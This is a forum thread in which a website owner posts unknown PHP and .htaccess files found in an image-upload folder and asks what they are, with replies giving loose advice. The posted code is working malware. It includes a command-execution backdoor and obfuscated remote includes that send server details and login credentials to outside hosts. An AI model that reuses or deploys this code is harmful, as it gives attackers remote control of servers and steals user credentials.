Weird Files Created!

[pbjorge12]

Hey...I'm a little worried about this odd problem that has begun to show up - Can anyone tell me what it means?

Today I went through a folder of mine on my server called uploadedImages that stores images users uploaded. I check the mime type to prevent other files from being added...The strange thing was I found 2 .php files and a .htaccess file in each subfolder (thumb, smallThumb, and Full).

I will include the "full" folder's files...

base.php
[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
[/code]

Create.php
[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
[/code]

.htaccess
[code]Options -MultiViews
ErrorDocument 404 //uploadedImages/cover/full/create.php
[/code]

Note: Different file name's with different content were in eac folder...
Note2: The files were created by "nobody" the default apache user...

Is this normal? What is it? What is its purpose?

[redarrow]

i dont know but i also got a .php files put in my folder one day and it outputted all my code within that folder.

scary?

[pbjorge12]

Its VERY scary...
If I don't get this figured out I'm gonna be up ALL night!

[redarrow]

take away the [][] brackets to see the code larger ok

[redarrow]

if you find that you havent done any valadation on users uploading the correct file exstention then post the upload revelent code.

if you have done that read on!


ok you made me paranoid know what i did 5 min ago is cheek the phpmyadmin for any databases that i didnt no off being mine you should take these steps.

i had no extra ones thank god.

know what i understand is that if a hacker got your mysql deatails then they can use your database for there own needs and in some cases also use a folder you didnt know about but the best pratice is to cheeck the database entrys and if there all yours lol............... your ok you can sleep tonight ok.

but

in the worse sititation and a person has leached onto your database then you have to reset the passwords on all your scripts and database ok.

and then delete any unknown folders and files .

i would sugest a fresh copy of everthink ok.

scary good luck.

[pbjorge12]

Well...After doing some reasearch this is an exploit that works with directories with 777 permissions (Which mine is).
I am still looking for a fix...

[redarrow]

exsplain more what do you mead an exsploit


what they get in 777 folders how?

lol you make me more worried?